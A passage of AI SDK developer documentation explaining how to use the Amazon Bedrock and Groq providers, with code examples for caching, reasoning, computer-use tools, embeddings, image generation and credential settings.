content: `You are an expert on William Gibson's cyberpunk literature and themes. You have access to the following academic analysis: ${cyberpunkAnalysis}`,
providerOptions: {
bedrock: { cachePoint: { type: 'default' } },
},
},
{
role: 'user',
content:
'What are the key cyberpunk themes that Gibson explores in Neuromancer?',
},
],
});
console.log(result.text);
console.log(result.providerMetadata?.bedrock?.usage);
// Shows cache read/write token usage, e.g.:
// {
// cacheReadInputTokens: 1337,
// cacheWriteInputTokens: 42,
// }
Cache points also work with streaming responses:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { streamText } from 'ai';
const cyberpunkAnalysis =
'... literary analysis of cyberpunk themes and concepts ...';
const result = streamText({
model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
messages: [
{
role: 'assistant',
content: [
{ type: 'text', text: 'You are an expert on cyberpunk literature.' },
{ type: 'text', text: `Academic analysis: ${cyberpunkAnalysis}` },
],
providerOptions: { bedrock: { cachePoint: { type: 'default' } } },
},
{
role: 'user',
content:
'How does Gibson explore the relationship between humanity and technology?',
},
],
});
for await (const textPart of result.textStream) {
process.stdout.write(textPart);
}
console.log(
'Cache token usage:',
(await result.providerMetadata)?.bedrock?.usage,
);
// Shows cache read/write token usage, e.g.:
// {
// cacheReadInputTokens: 1337,
// cacheWriteInputTokens: 42,
// }
Reasoning
Amazon Bedrock supports model creator-specific reasoning features:
- Anthropic (e.g. `claude-3-7-sonnet-20250219`): enable via the `reasoningConfig` provider option and specify a thinking budget in tokens (minimum: `1024`, maximum: `64000`).
- Amazon (e.g. `us.amazon.nova-2-lite-v1:0`): enable via the `reasoningConfig` provider option and specify a maximum reasoning effort level (`'low' | 'medium' | 'high'`).
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
// Anthropic example
const anthropicResult = await generateText({
model: bedrock('us.anthropic.claude-3-7-sonnet-20250219-v1:0'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
bedrock: {
reasoningConfig: { type: 'enabled', budgetTokens: 1024 },
},
},
});
console.log(anthropicResult.reasoning); // reasoning text
console.log(anthropicResult.text); // text response
// Nova 2 example
const amazonResult = await generateText({
model: bedrock('us.amazon.nova-2-lite-v1:0'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
bedrock: {
reasoningConfig: { type: 'enabled', maxReasoningEffort: 'medium' },
},
},
});
console.log(amazonResult.reasoning); // reasoning text
console.log(amazonResult.text); // text response
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Extended Context Window
Claude Sonnet 4 models on Amazon Bedrock support an extended context window of up to 1 million tokens when using the context-1m-2025-08-07 beta feature.
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const result = await generateText({
model: bedrock('us.anthropic.claude-sonnet-4-20250514-v1:0'),
prompt: 'analyze this large document...',
providerOptions: {
bedrock: {
anthropicBeta: ['context-1m-2025-08-07'],
},
},
});
Computer Use
Via Anthropic, Amazon Bedrock provides three provider-defined tools that can be used to interact with external systems:
- Bash Tool: Allows running bash commands.
- Text Editor Tool: Provides functionality for viewing and editing text files.
- Computer Tool: Enables control of keyboard and mouse actions on a computer.
They are available via the tools property of the provider instance.
Bash Tool
The Bash Tool allows running bash commands. Here's how to create and use it:
const bashTool = anthropic.tools.bash_20241022({
execute: async ({ command, restart }) => {
// Implement your bash command execution logic here
// Return the result of the command execution
},
});
Parameters:
- `command` (string): The bash command to run. Required unless the tool is being restarted.
- `restart` (boolean, optional): Specifying `true` will restart this tool.
Text Editor Tool
The Text Editor Tool provides functionality for viewing and editing text files.
For Claude 4 models (Opus & Sonnet):
const textEditorTool = anthropic.tools.textEditor_20250429({
execute: async ({
command,
path,
file_text,
insert_line,
new_str,
old_str,
view_range,
}) => {
// Implement your text editing logic here
// Return the result of the text editing operation
},
});
For Claude 3.5 Sonnet and earlier models:
const textEditorTool = anthropic.tools.textEditor_20241022({
execute: async ({
command,
path,
file_text,
insert_line,
new_str,
old_str,
view_range,
}) => {
// Implement your text editing logic here
// Return the result of the text editing operation
},
});
Parameters:
- `command` ('view' | 'create' | 'str_replace' | 'insert' | 'undo_edit'): The command to run. Note: `undo_edit` is only available in Claude 3.5 Sonnet and earlier models.
- `path` (string): Absolute path to file or directory, e.g. `/repo/file.py` or `/repo`.
- `file_text` (string, optional): Required for `create` command, with the content of the file to be created.
- `insert_line` (number, optional): Required for `insert` command. The line number after which to insert the new string.
- `new_str` (string, optional): New string for `str_replace` or `insert` commands.
- `old_str` (string, optional): Required for `str_replace` command, containing the string to replace.
- `view_range` (number[], optional): Optional for `view` command to specify line range to show.
When using the Text Editor Tool, make sure to name the key in the tools object correctly:
- Claude 4 models: Use `str_replace_based_edit_tool`
- Claude 3.5 Sonnet and earlier: Use `str_replace_editor`
// For Claude 4 models
const response = await generateText({
model: bedrock('us.anthropic.claude-sonnet-4-20250514-v1:0'),
prompt:
"Create a new file called example.txt, write 'Hello World' to it, and run 'cat example.txt' in the terminal",
tools: {
str_replace_based_edit_tool: textEditorTool, // Claude 4 tool name
},
});
// For Claude 3.5 Sonnet and earlier
const response = await generateText({
model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
prompt:
"Create a new file called example.txt, write 'Hello World' to it, and run 'cat example.txt' in the terminal",
tools: {
str_replace_editor: textEditorTool, // Earlier models tool name
},
});
Computer Tool
The Computer Tool enables control of keyboard and mouse actions on a computer:
import fs from 'fs';

const computerTool = anthropic.tools.computer_20241022({
displayWidthPx: 1920,
displayHeightPx: 1080,
displayNumber: 0, // Optional, for X11 environments
execute: async ({ action, coordinate, text }) => {
// Implement your computer control logic here
// Return the result of the action
// Example code:
switch (action) {
case 'screenshot': {
// multipart result:
return {
type: 'image',
data: fs
.readFileSync('./data/screenshot-editor.png')
.toString('base64'),
};
}
default: {
console.log('Action:', action);
console.log('Coordinate:', coordinate);
console.log('Text:', text);
return `executed ${action}`;
}
}
},
// map to tool result content for LLM consumption:
toModelOutput(result) {
return typeof result === 'string'
? [{ type: 'text', text: result }]
: [{ type: 'image', data: result.data, mediaType: 'image/png' }];
},
});
Parameters:
- `action` ('key' | 'type' | 'mouse_move' | 'left_click' | 'left_click_drag' | 'right_click' | 'middle_click' | 'double_click' | 'screenshot' | 'cursor_position'): The action to perform.
- `coordinate` (number[], optional): Required for `mouse_move` and `left_click_drag` actions. Specifies the (x, y) coordinates.
- `text` (string, optional): Required for `type` and `key` actions.
These tools can be used in conjunction with the anthropic.claude-3-5-sonnet-20240620-v1:0 model to enable more complex interactions and tasks.
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| `amazon.titan-tg1-large` | | | | |
| `amazon.titan-text-express-v1` | | | | |
| `amazon.titan-text-lite-v1` | | | | |
| `us.amazon.nova-premier-v1:0` | | | | |
| `us.amazon.nova-pro-v1:0` | | | | |
| `us.amazon.nova-lite-v1:0` | | | | |
| `us.amazon.nova-micro-v1:0` | | | | |
| `anthropic.claude-haiku-4-5-20251001-v1:0` | | | | |
| `anthropic.claude-sonnet-4-20250514-v1:0` | | | | |
| `anthropic.claude-sonnet-4-5-20250929-v1:0` | | | | |
| `anthropic.claude-opus-4-20250514-v1:0` | | | | |
| `anthropic.claude-opus-4-1-20250805-v1:0` | | | | |
| `anthropic.claude-3-7-sonnet-20250219-v1:0` | | | | |
| `anthropic.claude-3-5-sonnet-20241022-v2:0` | | | | |
| `anthropic.claude-3-5-sonnet-20240620-v1:0` | | | | |
| `anthropic.claude-3-5-haiku-20241022-v1:0` | | | | |
| `anthropic.claude-3-opus-20240229-v1:0` | | | | |
| `anthropic.claude-3-sonnet-20240229-v1:0` | | | | |
| `anthropic.claude-3-haiku-20240307-v1:0` | | | | |
| `us.anthropic.claude-sonnet-4-20250514-v1:0` | | | | |
| `us.anthropic.claude-sonnet-4-5-20250929-v1:0` | | | | |
| `us.anthropic.claude-opus-4-20250514-v1:0` | | | | |
| `us.anthropic.claude-opus-4-1-20250805-v1:0` | | | | |
| `us.anthropic.claude-3-7-sonnet-20250219-v1:0` | | | | |
| `us.anthropic.claude-3-5-sonnet-20241022-v2:0` | | | | |
| `us.anthropic.claude-3-5-sonnet-20240620-v1:0` | | | | |
| `us.anthropic.claude-3-5-haiku-20241022-v1:0` | | | | |
| `us.anthropic.claude-3-sonnet-20240229-v1:0` | | | | |
| `us.anthropic.claude-3-opus-20240229-v1:0` | | | | |
| `us.anthropic.claude-3-haiku-20240307-v1:0` | | | | |
| `anthropic.claude-v2` | | | | |
| `anthropic.claude-v2:1` | | | | |
| `anthropic.claude-instant-v1` | | | | |
| `cohere.command-text-v14` | | | | |
| `cohere.command-light-text-v14` | | | | |
| `cohere.command-r-v1:0` | | | | |
| `cohere.command-r-plus-v1:0` | | | | |
| `us.deepseek.r1-v1:0` | | | | |
| `meta.llama3-8b-instruct-v1:0` | | | | |
| `meta.llama3-70b-instruct-v1:0` | | | | |
| `meta.llama3-1-8b-instruct-v1:0` | | | | |
| `meta.llama3-1-70b-instruct-v1:0` | | | | |
| `meta.llama3-1-405b-instruct-v1:0` | | | | |
| `meta.llama3-2-1b-instruct-v1:0` | | | | |
| `meta.llama3-2-3b-instruct-v1:0` | | | | |
| `meta.llama3-2-11b-instruct-v1:0` | | | | |
| `meta.llama3-2-90b-instruct-v1:0` | | | | |
| `us.meta.llama3-2-1b-instruct-v1:0` | | | | |
| `us.meta.llama3-2-3b-instruct-v1:0` | | | | |
| `us.meta.llama3-2-11b-instruct-v1:0` | | | | |
| `us.meta.llama3-2-90b-instruct-v1:0` | | | | |
| `us.meta.llama3-1-8b-instruct-v1:0` | | | | |
| `us.meta.llama3-1-70b-instruct-v1:0` | | | | |
| `us.meta.llama3-3-70b-instruct-v1:0` | | | | |
| `us.meta.llama4-scout-17b-instruct-v1:0` | | | | |
| `us.meta.llama4-maverick-17b-instruct-v1:0` | | | | |
| `mistral.mistral-7b-instruct-v0:2` | | | | |
| `mistral.mixtral-8x7b-instruct-v0:1` | | | | |
| `mistral.mistral-large-2402-v1:0` | | | | |
| `mistral.mistral-small-2402-v1:0` | | | | |
| `us.mistral.pixtral-large-2502-v1:0` | | | | |
| `openai.gpt-oss-120b-1:0` | | | | |
| `openai.gpt-oss-20b-1:0` | | | | |
Embedding Models
You can create models that call the Bedrock API using the .textEmbedding() factory method.
const model = bedrock.textEmbedding('amazon.titan-embed-text-v1');
Bedrock Titan embedding model amazon.titan-embed-text-v2:0 supports several additional settings. You can pass them as an options argument:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { embed } from 'ai';
const model = bedrock.textEmbedding('amazon.titan-embed-text-v2:0');
const { embedding } = await embed({
model,
value: 'sunny day at the beach',
providerOptions: {
bedrock: {
dimensions: 512, // optional, number of dimensions for the embedding
normalize: true, // optional, normalize the output embeddings
},
},
});
The following optional provider options are available for Bedrock Titan embedding models:
- `dimensions` (number): The number of dimensions the output embeddings should have. The following values are accepted: 1024 (default), 512, 256.
- `normalize` (boolean): Flag indicating whether or not to normalize the output embeddings. Defaults to `true`.
Model Capabilities
| Model | Default Dimensions | Custom Dimensions |
|---|---|---|
| `amazon.titan-embed-text-v1` | 1536 | |
| `amazon.titan-embed-text-v2:0` | 1024 | |
| `cohere.embed-english-v3` | 1024 | |
| `cohere.embed-multilingual-v3` | 1024 | |
Image Models
You can create models that call the Bedrock API using the .image() factory method.
For more on the Amazon Nova Canvas image model, see the Nova Canvas Overview.
const model = bedrock.image('amazon.nova-canvas-v1:0');
You can then generate images with the experimental_generateImage function:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: bedrock.image('amazon.nova-canvas-v1:0'),
prompt: 'A beautiful sunset over a calm ocean',
size: '512x512',
seed: 42,
});
You can also pass the providerOptions object to the generateImage function to customize the generation behavior:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: bedrock.image('amazon.nova-canvas-v1:0'),
prompt: 'A beautiful sunset over a calm ocean',
size: '512x512',
seed: 42,
providerOptions: {
bedrock: {
quality: 'premium',
negativeText: 'blurry, low quality',
cfgScale: 7.5,
style: 'PHOTOREALISM',
},
},
});
The following optional provider options are available for Amazon Nova Canvas:
- `quality` (string): The quality level for image generation. Accepts `'standard'` or `'premium'`.
- `negativeText` (string): Text describing what you don't want in the generated image.
- `cfgScale` (number): Controls how closely the generated image adheres to the prompt. Higher values result in images that are more closely aligned to the prompt.
- `style` (string): Predefined visual style for image generation. Accepts one of: `3D_ANIMATED_FAMILY_FILM`, `DESIGN_SKETCH`, `FLAT_VECTOR_ILLUSTRATION`, `GRAPHIC_NOVEL_ILLUSTRATION`, `MAXIMALISM`, `MIDCENTURY_RETRO`, `PHOTOREALISM`, `SOFT_DIGITAL_PAINTING`.
Documentation for additional settings can be found within the Amazon Bedrock User Guide for Amazon Nova Documentation.
Image Model Settings
You can customize the generation behavior with optional options:
await generateImage({
model: bedrock.image('amazon.nova-canvas-v1:0'),
prompt: 'A beautiful sunset over a calm ocean',
size: '512x512',
seed: 42,
maxImagesPerCall: 1, // Maximum number of images to generate per API call
});
- `maxImagesPerCall` (number): Override the maximum number of images generated per API call. The default can vary by model, with 5 as a common default.
Model Capabilities
The Amazon Nova Canvas model supports custom sizes with constraints as follows:
- Each side must be between 320-4096 pixels, inclusive.
- Each side must be evenly divisible by 16.
- The aspect ratio must be between 1:4 and 4:1. That is, one side can't be more than 4 times longer than the other side.
- The total pixel count must be less than 4,194,304.
For more, see Image generation access and usage.
| Model | Sizes |
|---|---|
| `amazon.nova-canvas-v1:0` | Custom sizes: 320-4096px per side (must be divisible by 16), aspect ratio 1:4 to 4:1, max 4.2M pixels |
Response Headers
The Amazon Bedrock provider returns the response headers associated with network requests made to the Bedrock servers.
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const result = await generateText({
  model: bedrock('meta.llama3-70b-instruct-v1:0'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

console.log(result.response.headers);
Below is sample output where you can see the x-amzn-requestid header. This can
be useful for correlating Bedrock API calls with requests made by the AI SDK:
{
connection: 'keep-alive',
'content-length': '2399',
'content-type': 'application/json',
date: 'Fri, 07 Feb 2025 04:28:30 GMT',
'x-amzn-requestid': 'c9f3ace4-dd5d-49e5-9807-39aedfa47c8e'
}
This information is also available with streamText:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { streamText } from 'ai';
const result = streamText({
model: bedrock('meta.llama3-70b-instruct-v1:0'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
for await (const textPart of result.textStream) {
process.stdout.write(textPart);
}
console.log('Response headers:', (await result.response).headers);
With sample output as:
{
connection: 'keep-alive',
'content-type': 'application/vnd.amazon.eventstream',
date: 'Fri, 07 Feb 2025 04:33:37 GMT',
'transfer-encoding': 'chunked',
'x-amzn-requestid': 'a976e3fc-0e45-4241-9954-b9bdd80ab407'
}
Bedrock Anthropic Provider Usage
The Bedrock Anthropic provider offers support for Anthropic's Claude models through Amazon Bedrock's native InvokeModel API. This provides full feature parity with the Anthropic API, including features that may not be available through the Converse API (such as stop_sequence in streaming responses).
For more information on Claude models available on Amazon Bedrock, see Claude on Amazon Bedrock.
Provider Instance
You can import the default provider instance bedrockAnthropic from @ai-sdk/amazon-bedrock/anthropic:
import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
If you need a customized setup, you can import createBedrockAnthropic from @ai-sdk/amazon-bedrock/anthropic and create a provider instance with your settings:
import { createBedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
const bedrockAnthropic = createBedrockAnthropic({
region: 'us-east-1', // optional
accessKeyId: 'xxxxxxxxx', // optional
secretAccessKey: 'xxxxxxxxx', // optional
sessionToken: 'xxxxxxxxx', // optional
});
Provider Settings
You can use the following optional settings to customize the Bedrock Anthropic provider instance:
- `region` (string): The AWS region that you want to use for the API calls. It uses the `AWS_REGION` environment variable by default.
- `accessKeyId` (string): The AWS access key ID that you want to use for the API calls. It uses the `AWS_ACCESS_KEY_ID` environment variable by default.
- `secretAccessKey` (string): The AWS secret access key that you want to use for the API calls. It uses the `AWS_SECRET_ACCESS_KEY` environment variable by default.
- `sessionToken` (string, optional): The AWS session token that you want to use for the API calls. It uses the `AWS_SESSION_TOKEN` environment variable by default.
- `apiKey` (string): API key for authenticating requests using Bearer token authentication. When provided, this will be used instead of AWS SigV4 authentication. It uses the `AWS_BEARER_TOKEN_BEDROCK` environment variable by default.
- `baseURL` (string): Base URL for the Bedrock API calls. Useful for custom endpoints or proxy configurations.
- `headers` (Resolvable<Record<string, string | undefined>>): Headers to include in the requests.
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
- `credentialProvider` (() => PromiseLike<BedrockCredentials>, optional): The AWS credential provider to use to get dynamic credentials similar to the AWS SDK. Setting a provider here will cause its credential values to be used instead of the `accessKeyId`, `secretAccessKey`, and `sessionToken` settings.
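For example, a minimal sketch using Bearer token authentication instead of SigV4 (the region is illustrative):

import { createBedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';

const bedrockAnthropic = createBedrockAnthropic({
  region: 'us-east-1',
  apiKey: process.env.AWS_BEARER_TOKEN_BEDROCK, // Bearer auth instead of AWS SigV4
});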
Language Models
You can create models that call the Anthropic Messages API using the provider instance.
The first argument is the model id, e.g. us.anthropic.claude-3-5-sonnet-20241022-v2:0.
const model = bedrockAnthropic('us.anthropic.claude-3-5-sonnet-20241022-v2:0');
You can use Bedrock Anthropic language models to generate text with the generateText function:
import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: bedrockAnthropic('us.anthropic.claude-3-5-sonnet-20241022-v2:0'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Provider Options
The following optional provider options are available for Bedrock Anthropic models:
- `metadata` (object, optional): Metadata to include with the request. See the Anthropic API documentation for details.
  - `userId` (string): An external identifier for the end-user.
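A minimal sketch passing request metadata (the userId value is illustrative):

import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText } from 'ai';

const result = await generateText({
  model: bedrockAnthropic('us.anthropic.claude-3-5-sonnet-20241022-v2:0'),
  prompt: 'Hello!',
  providerOptions: {
    anthropic: {
      metadata: { userId: 'user-123' }, // external end-user identifier
    },
  },
});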
Cache Control
In the messages and message parts, you can use the providerOptions property to set cache control breakpoints.
You need to set the anthropic property in the providerOptions object to { cacheControl: { type: 'ephemeral' } } to set a cache control breakpoint.
import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText } from 'ai';
const result = await generateText({
model: bedrockAnthropic('us.anthropic.claude-3-7-sonnet-20250219-v1:0'),
messages: [
{
role: 'system',
content: 'You are an expert assistant.',
providerOptions: {
anthropic: { cacheControl: { type: 'ephemeral' } },
},
},
{
role: 'user',
content: 'Explain quantum computing.',
},
],
});
Computer Use
The Bedrock Anthropic provider supports Anthropic's computer use tools:
- Bash Tool: Allows running bash commands.
- Text Editor Tool: Provides functionality for viewing and editing text files.
- Computer Tool: Enables control of keyboard and mouse actions on a computer.
They are available via the tools property of the provider instance.
Bash Tool
import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText, stepCountIs } from 'ai';
const result = await generateText({
model: bedrockAnthropic('us.anthropic.claude-3-7-sonnet-20250219-v1:0'),
tools: {
bash: bedrockAnthropic.tools.bash_20241022({
execute: async ({ command }) => {
// Implement your bash command execution logic here
return [{ type: 'text', text: `Executed: ${command}` }];
},
}),
},
prompt: 'List the files in my directory.',
stopWhen: stepCountIs(2),
});
Text Editor Tool
import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText, stepCountIs } from 'ai';
const result = await generateText({
model: bedrockAnthropic('us.anthropic.claude-3-7-sonnet-20250219-v1:0'),
tools: {
str_replace_editor: bedrockAnthropic.tools.textEditor_20241022({
execute: async ({ command, path, old_str, new_str }) => {
// Implement your text editing logic here
return 'File updated successfully';
},
}),
},
prompt: 'Update my README file.',
stopWhen: stepCountIs(5),
});
Computer Tool
import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText, stepCountIs } from 'ai';
import fs from 'fs';
const result = await generateText({
model: bedrockAnthropic('us.anthropic.claude-3-7-sonnet-20250219-v1:0'),
tools: {
computer: bedrockAnthropic.tools.computer_20241022({
displayWidthPx: 1024,
displayHeightPx: 768,
execute: async ({ action, coordinate, text }) => {
if (action === 'screenshot') {
return {
type: 'image',
data: fs.readFileSync('./screenshot.png').toString('base64'),
};
}
return `executed ${action}`;
},
toModelOutput({ output }) {
return {
type: 'content',
value: [
typeof output === 'string'
? { type: 'text', text: output }
: {
type: 'image-data',
data: output.data,
mediaType: 'image/png',
},
],
};
},
}),
},
prompt: 'Take a screenshot.',
stopWhen: stepCountIs(3),
});
Reasoning
Anthropic has reasoning support for Claude 3.7 and Claude 4 models on Bedrock, including:
- `us.anthropic.claude-opus-4-7`
- `us.anthropic.claude-opus-4-6-v1`
- `us.anthropic.claude-opus-4-5-20251101-v1:0`
- `us.anthropic.claude-sonnet-4-5-20250929-v1:0`
- `us.anthropic.claude-opus-4-20250514-v1:0`
- `us.anthropic.claude-sonnet-4-20250514-v1:0`
- `us.anthropic.claude-opus-4-1-20250805-v1:0`
- `us.anthropic.claude-haiku-4-5-20251001-v1:0`
- `us.anthropic.claude-3-7-sonnet-20250219-v1:0`
You can enable it using the thinking provider option and specifying a thinking budget in tokens.
import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText } from 'ai';
const { text, reasoningText, reasoning } = await generateText({
model: bedrockAnthropic('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
},
},
});
console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Computer Use | Reasoning |
|---|---|---|---|---|---|
| `us.anthropic.claude-opus-4-7` | | | | | |
| `us.anthropic.claude-opus-4-6-v1` | | | | | |
| `us.anthropic.claude-opus-4-5-20251101-v1:0` | | | | | |
| `us.anthropic.claude-sonnet-4-5-20250929-v1:0` | | | | | |
| `us.anthropic.claude-opus-4-20250514-v1:0` | | | | | |
| `us.anthropic.claude-sonnet-4-20250514-v1:0` | | | | | |
| `us.anthropic.claude-opus-4-1-20250805-v1:0` | | | | | |
| `us.anthropic.claude-haiku-4-5-20251001-v1:0` | | | | | |
| `us.anthropic.claude-3-7-sonnet-20250219-v1:0` | | | | | |
| `us.anthropic.claude-3-5-sonnet-20241022-v2:0` | | | | | |
| `us.anthropic.claude-3-5-haiku-20241022-v1:0` | | | | | |
Migrating to @ai-sdk/amazon-bedrock 2.x
The Amazon Bedrock provider was rewritten in version 2.x to remove the
dependency on the @aws-sdk/client-bedrock-runtime package.
The bedrockOptions provider setting previously available has been removed. If
you were using the bedrockOptions object, you should now use the region,
accessKeyId, secretAccessKey, and sessionToken settings directly instead.
Note that you may need to set all of these explicitly, e.g. even if you're not
using sessionToken, set it to undefined. If you're running in a serverless
environment, there may be default environment variables set by your containing
environment that the Amazon Bedrock provider will then pick up and could
conflict with the ones you're intending to use.
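A minimal sketch of the equivalent 2.x configuration, assuming you previously passed these values via bedrockOptions:

import { createAmazonBedrock } from '@ai-sdk/amazon-bedrock';

const bedrock = createAmazonBedrock({
  region: process.env.AWS_REGION,
  accessKeyId: process.env.AWS_ACCESS_KEY_ID,
  secretAccessKey: process.env.AWS_SECRET_ACCESS_KEY,
  // set explicitly, even to undefined, so ambient environment
  // variables cannot silently override your configuration:
  sessionToken: process.env.AWS_SESSION_TOKEN ?? undefined,
});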
title: Groq description: Learn how to use Groq.
Groq Provider
The Groq provider contains language model support for the Groq API.
Setup
The Groq provider is available via the @ai-sdk/groq module.
You can install it with
pnpm add @ai-sdk/groq
Provider Instance
You can import the default provider instance groq from @ai-sdk/groq:
import { groq } from '@ai-sdk/groq';
If you need a customized setup, you can import createGroq from @ai-sdk/groq
and create a provider instance with your settings:
import { createGroq } from '@ai-sdk/groq';
const groq = createGroq({
// custom settings
});
You can use the following optional settings to customize the Groq provider instance:
- `baseURL` (string): Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is `https://api.groq.com/openai/v1`.
- `apiKey` (string): API key that is being sent using the `Authorization` header. It defaults to the `GROQ_API_KEY` environment variable.
- `headers` (Record<string, string>): Custom headers to include in the requests.
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create Groq models using a provider instance.
The first argument is the model id, e.g. gemma2-9b-it.
const model = groq('gemma2-9b-it');
Reasoning Models
Groq offers several reasoning models such as qwen-qwq-32b and deepseek-r1-distill-llama-70b.
You can configure how the reasoning is exposed in the generated text by using the reasoningFormat option.
It supports the options parsed, hidden, and raw.
import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';
const result = await generateText({
model: groq('qwen/qwen3-32b'),
providerOptions: {
groq: {
reasoningFormat: 'parsed',
reasoningEffort: 'default',
parallelToolCalls: true, // Enable parallel function calling (default: true)
user: 'user-123', // Unique identifier for end-user (optional)
serviceTier: 'flex', // Use flex tier for higher throughput (optional)
},
},
prompt: 'How many "r"s are in the word "strawberry"?',
});
The following optional provider options are available for Groq language models:
- `reasoningFormat` ('parsed' | 'raw' | 'hidden'): Controls how reasoning is exposed in the generated text. Only supported by reasoning models like `qwen-qwq-32b` and `deepseek-r1-distill-*` models. For a complete list of reasoning models and their capabilities, see Groq's reasoning models documentation.
- `reasoningEffort` ('low' | 'medium' | 'high' | 'none' | 'default'): Controls the level of effort the model will put into reasoning.
  - `qwen/qwen3-32b` - Supported values: `none` (disable reasoning; the model will not use any reasoning tokens) and `default` (enable reasoning). Defaults to `default` for `qwen/qwen3-32b`.
  - gpt-oss 20b / gpt-oss 120b - Supported values: `low`, `medium`, and `high` levels of reasoning effort.
- `structuredOutputs` (boolean): Whether to use structured outputs. Defaults to `true`. When enabled, object generation will use the `json_schema` format instead of the `json_object` format, providing more reliable structured outputs.
- `parallelToolCalls` (boolean): Whether to enable parallel function calling during tool use. Defaults to `true`.
- `user` (string): A unique identifier representing your end-user, which can help with monitoring and abuse detection.
- `serviceTier` ('on_demand' | 'flex' | 'auto'): Service tier for the request. Defaults to `'on_demand'`.
  - `'on_demand'`: Default tier with consistent performance and fairness.
  - `'flex'`: Higher throughput tier (10x rate limits) optimized for workloads that can handle occasional request failures.
  - `'auto'`: Uses on_demand rate limits first, then falls back to the flex tier if exceeded.
  For more details about service tiers and their benefits, see Groq's Flex Processing documentation.
Only Groq reasoning models support the reasoningFormat option.
Structured Outputs
Structured outputs are enabled by default for Groq models.
You can disable them by setting the structuredOutputs option to false.
import { groq } from '@ai-sdk/groq';
import { generateObject } from 'ai';
import { z } from 'zod';
const result = await generateObject({
model: groq('moonshotai/kimi-k2-instruct-0905'),
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(z.string()),
instructions: z.array(z.string()),
}),
}),
prompt: 'Generate a simple pasta recipe.',
});
console.log(JSON.stringify(result.object, null, 2));
You can disable structured outputs for models that don't support them:
import { groq } from '@ai-sdk/groq';
import { generateObject } from 'ai';
import { z } from 'zod';
const result = await generateObject({
model: groq('gemma2-9b-it'),
providerOptions: {
groq: {
structuredOutputs: false,
},
},
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(z.string()),
instructions: z.array(z.string()),
}),
}),
prompt: 'Generate a simple pasta recipe in JSON format.',
});
console.log(JSON.stringify(result.object, null, 2));
Example
You can use Groq language models to generate text with the generateText function:
import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';
const { text } = await generateText({
model: groq('gemma2-9b-it'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Image Input
Groq's multi-modal models like meta-llama/llama-4-scout-17b-16e-instruct support image inputs. You can include images in your messages using either URLs or base64-encoded data:
import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';
const { text } = await generateText({
model: groq('meta-llama/llama-4-scout-17b-16e-instruct'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'What do you see in this image?' },
{
type: 'image',
image: 'https://example.com/image.jpg',
},
],
},
],
});
You can also use base64-encoded images:
import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';
import { readFileSync } from 'fs';
const imageData = readFileSync('path/to/image.jpg', 'base64');
const { text } = await generateText({
model: groq('meta-llama/llama-4-scout-17b-16e-instruct'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'Describe this image in detail.' },
{
type: 'image',
image: `data:image/jpeg;base64,${imageData}`,
},
],
},
],
});
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| `gemma2-9b-it` | | | | |
| `llama-3.1-8b-instant` | | | | |
| `llama-3.3-70b-versatile` | | | | |
| `meta-llama/llama-guard-4-12b` | | | | |
| `deepseek-r1-distill-llama-70b` | | | | |
| `meta-llama/llama-4-maverick-17b-128e-instruct` | | | | |
| `meta-llama/llama-4-scout-17b-16e-instruct` | | | | |
| `meta-llama/llama-prompt-guard-2-22m` | | | | |
| `meta-llama/llama-prompt-guard-2-86m` | | | | |
